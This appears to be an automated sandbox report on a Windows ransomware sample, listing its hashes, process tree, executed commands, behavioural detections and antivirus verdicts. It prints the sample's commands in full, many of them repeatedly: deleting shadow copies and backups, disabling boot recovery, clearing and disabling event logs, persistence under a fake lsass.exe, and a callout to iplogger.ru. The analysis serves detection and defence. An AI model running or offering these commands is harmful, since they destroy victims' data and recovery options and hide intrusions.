2303Exes_636d3c669e36510bf337fd2f1ea64732_tmp_2019-09-18_14_30.txt
  1.  
  2. * ID: 2303
  3. * MalFamily: "Malicious"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
  8. * File Size: 435200
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
  11. * MD5: "636d3c669e36510bf337fd2f1ea64732"
  12. * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
  13. * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
  14. * CRC32: "D4F2AC3B"
  15. * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
  16.  
  17. * Process Execution:
  18. "nH3pXIYjPPePo.exe",
  19. "cmd.exe",
  20. "reg.exe",
  21. "lsass.exe",
  22. "cmd.exe",
  23. "cmd.exe",
  24. "cmd.exe",
  25. "cmd.exe",
  26. "cmd.exe",
  27. "cmd.exe",
  28. "cmd.exe",
  29. "WMIC.exe",
  30. "cmd.exe",
  31. "vssadmin.exe",
  32. "cmd.exe",
  33. "reg.exe",
  34. "cmd.exe",
  35. "reg.exe",
  36. "cmd.exe",
  37. "reg.exe",
  38. "cmd.exe",
  39. "attrib.exe",
  40. "cmd.exe",
  41. "cmd.exe",
  42. "wevtutil.exe",
  43. "cmd.exe",
  44. "wevtutil.exe",
  45. "cmd.exe",
  46. "wevtutil.exe",
  47. "cmd.exe",
  48. "sc.exe",
  49. "lsass.exe",
  50. "lsass.exe",
  51. "cmd.exe",
  52. "PING.EXE",
  53. "services.exe",
  54. "svchost.exe",
  55. "WmiPrvSE.exe",
  56. "VSSVC.exe",
  57. "taskhost.exe",
  58. "WMIADAP.exe"
  59.  
  60.  
  61. * Executed Commands:
  62. "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  63. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
  64. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
  65. "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
  66. "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
  67. "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  68. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
  69. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
  70. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
  71. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
  72. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
  73. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
  74. "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
  75. "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
  76. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  77. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  78. "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  79. "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
  80. "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
  81. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
  82. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
  83. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
  84. "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
  85. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
  86. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
  87. "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
  88. "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
  89. "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
  90. "C:\\Windows\\system32\\vssvc.exe",
  91. "vssadmin delete shadows /all /quiet",
  92. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  93. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  94. "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  95. "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
  96. "wevtutil.exe clear-log Application",
  97. "wevtutil.exe clear-log Security",
  98. "wevtutil.exe clear-log System",
  99. "sc config eventlog start=disabled"
  100.  
  101.  
  102. * Signatures Detected:
  103.  
  104. "Description": "Behavioural detection: Executable code extraction",
  105. "Details":
  106.  
  107.  
  108. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  109. "Details":
  110.  
  111.  
  112. "Description": "Executed a command line with the /C or /R argument, which terminates the command shell on completion and can be used to hide execution",
  113. "Details":
  114.  
  115. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  116.  
  117.  
  118. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  119.  
  120.  
  121. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  122.  
  123.  
  124. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  125.  
  126.  
  127. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  128.  
  129.  
  130. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  131.  
  132.  
  133. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  134.  
  135.  
  136. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  137.  
  138.  
  139. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  140.  
  141.  
  142. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  143.  
  144.  
  145. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  146.  
  147.  
  148. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  149.  
  150.  
  151. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  152.  
  153.  
  154. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  155.  
  156.  
  157. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  158.  
  159.  
  160. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  161.  
  162.  
  163. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  164.  
  165.  
  166. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Creates RWX memory",
  172. "Details":
  173.  
  174.  
  175. "Description": "Possible date expiration check, exits too soon after checking local time",
  176. "Details":
  177.  
  178. "process": "nH3pXIYjPPePo.exe, PID 2244"
  179.  
  180.  
  181.  
  182.  
  183. "Description": "A process attempted to delay the analysis task.",
  184. "Details":
  185.  
  186. "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
  187.  
  188.  
  189.  
  190.  
  191. "Description": "Performs HTTP requests potentially not found in PCAP.",
  192. "Details":
  193.  
  194. "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
  195.  
  196.  
  197.  
  198.  
  199. "Description": "A process created a hidden window",
  200. "Details":
  201.  
  202. "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
  203.  
  204.  
  205.  
  206.  
  207. "Description": "Executed a command line with the /V argument, which modifies variable behaviour and whitespace, allowing for increased obfuscation options",
  208. "Details":
  209.  
  210. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  211.  
  212.  
  213.  
  214.  
  215. "Description": "Executed a very long command line or script command, which may be indicative of chained commands or obfuscation",
  216. "Details":
  217.  
  218. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  219.  
  220.  
  221.  
  222.  
  223. "Description": "Drops a binary and executes it",
  224. "Details":
  225.  
  226. "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  227.  
  228.  
  229.  
  230.  
  231. "Description": "A ping command was executed with the -n argument possibly to delay analysis",
  232. "Details":
  233.  
  234. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  235.  
  236.  
  237. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  238.  
  239.  
  240. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  241.  
  242.  
  243.  
  244.  
  245. "Description": "Uses Windows utilities for basic functionality",
  246. "Details":
  247.  
  248. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  249.  
  250.  
  251. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  252.  
  253.  
  254. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  255.  
  256.  
  257. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  258.  
  259.  
  260. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  261.  
  262.  
  263. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  264.  
  265.  
  266. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  267.  
  268.  
  269. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  270.  
  271.  
  272. "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  273.  
  274.  
  275. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  276.  
  277.  
  278. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  279.  
  280.  
  281. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  282.  
  283.  
  284. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  285.  
  286.  
  287. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  288.  
  289.  
  290. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  291.  
  292.  
  293. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  294.  
  295.  
  296. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  297.  
  298.  
  299. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  300.  
  301.  
  302. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  303.  
  304.  
  305. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  306.  
  307.  
  308. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  309.  
  310.  
  311. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  312.  
  313.  
  314. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  315.  
  316.  
  317. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  318.  
  319.  
  320. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  321.  
  322.  
  323. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  324.  
  325.  
  326. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  327.  
  328.  
  329. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  330.  
  331.  
  332. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  333.  
  334.  
  335. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  336.  
  337.  
  338. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  339.  
  340.  
  341. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  342.  
  343.  
  344. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  345.  
  346.  
  347. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  348.  
  349.  
  350. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  351.  
  352.  
  353. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  354.  
  355.  
  356. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  357.  
  358.  
  359. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  360.  
  361.  
  362. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  363.  
  364.  
  365. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  366.  
  367.  
  368. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  369.  
  370.  
  371. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  372.  
  373.  
  374. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  375.  
  376.  
  377. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  378.  
  379.  
  380. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  381.  
  382.  
  383. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  384.  
  385.  
  386. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  387.  
  388.  
  389. "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
  390.  
  391.  
  392. "command": "sc config eventlog start=disabled"
  393.  
  394.  
  395.  
  396.  
  397. "Description": "Attempts to delete volume shadow copies",
  398. "Details":
  399.  
  400.  
  401. "Description": "Deletes its original binary from disk",
  402. "Details":
  403.  
  404.  
  405. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  406. "Details":
  407.  
  408. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
  409.  
  410.  
  411.  
  412.  
  413. "Description": "Modifies boot configuration settings",
  414. "Details":
  415.  
  416. "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
  417.  
  418.  
  419. "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
  420.  
  421.  
  422.  
  423.  
  424. "Description": "A system process is generating network traffic, likely as a result of process injection",
  425. "Details":
  426.  
  427. "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
  428.  
  429.  
  430. "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
  431.  
  432.  
  433.  
  434.  
  435. "Description": "Installs itself for autorun at Windows startup",
  436. "Details":
  437.  
  438. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
  439.  
  440.  
  441. "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
  442.  
  443.  
  444.  
  445.  
  446. "Description": "Writes a potential ransom message to disk",
  447. "Details":
  448.  
  449. "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
  450.  
  451.  
  452.  
  453.  
  454. "Description": "File has been identified as malicious by 15 antivirus engines on VirusTotal",
  455. "Details":
  456.  
  457. "Cylance": "Unsafe"
  458.  
  459.  
  460. "CrowdStrike": "win/malicious_confidence_100% (D)"
  461.  
  462.  
  463. "Symantec": "ML.Attribute.HighConfidence"
  464.  
  465.  
  466. "APEX": "Malicious"
  467.  
  468.  
  469. "Endgame": "malicious (high confidence)"
  470.  
  471.  
  472. "Invincea": "heuristic"
  473.  
  474.  
  475. "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
  476.  
  477.  
  478. "FireEye": "Generic.mg.636d3c669e36510b"
  479.  
  480.  
  481. "SentinelOne": "DFI - Malicious PE"
  482.  
  483.  
  484. "Microsoft": "Trojan:Win32/Suloc.A"
  485.  
  486.  
  487. "Acronis": "suspicious"
  488.  
  489.  
  490. "VBA32": "Malware-Cryptor.General.3"
  491.  
  492.  
  493. "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
  494.  
  495.  
  496. "Cybereason": "malicious.5d1a74"
  497.  
  498.  
  499. "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
  500.  
  501.  
  502.  
  503.  
  504. "Description": "Detects VirtualBox through the presence of a file",
  505. "Details":
  506.  
  507. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
  508.  
  509.  
  510. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
  511.  
  512.  
  513. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
  514.  
  515.  
  516. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
  517.  
  518.  
  519. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
  520.  
  521.  
  522. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
  523.  
  524.  
  525.  
  526.  
  527. "Description": "Clears Windows events or logs",
  528. "Details":
  529.  
  530. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  531.  
  532.  
  533. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  534.  
  535.  
  536. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  537.  
  538.  
  539. "command": "wevtutil.exe clear-log Application"
  540.  
  541.  
  542. "command": "wevtutil.exe clear-log Security"
  543.  
  544.  
  545. "command": "wevtutil.exe clear-log System"
  546.  
  547.  
  548.  
  549.  
  550. "Description": "Appears to use character obfuscation in a command line",
  551. "Details":
  552.  
  553. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  554.  
  555.  
  556.  
  557.  
  558. "Description": "Creates a copy of itself",
  559. "Details":
  560.  
  561. "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  562.  
  563.  
  564.  
  565.  
  566. "Description": "Anomalous binary characteristics",
  567. "Details":
  568.  
  569. "anomaly": "Found duplicated section names"
  570.  
  571.  
  572.  
  573.  
  574. "Description": "Uses suspicious command line tools or Windows utilities",
  575. "Details":
  576.  
  577. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  578.  
  579.  
  580. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  581.  
  582.  
  583. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  584.  
  585.  
  586. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  587.  
  588.  
  589. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  590.  
  591.  
  592. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  593.  
  594.  
  595. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  596.  
  597.  
  598. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  599.  
  600.  
  601. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  602.  
  603.  
  604. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  605.  
  606.  
  607. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  608.  
  609.  
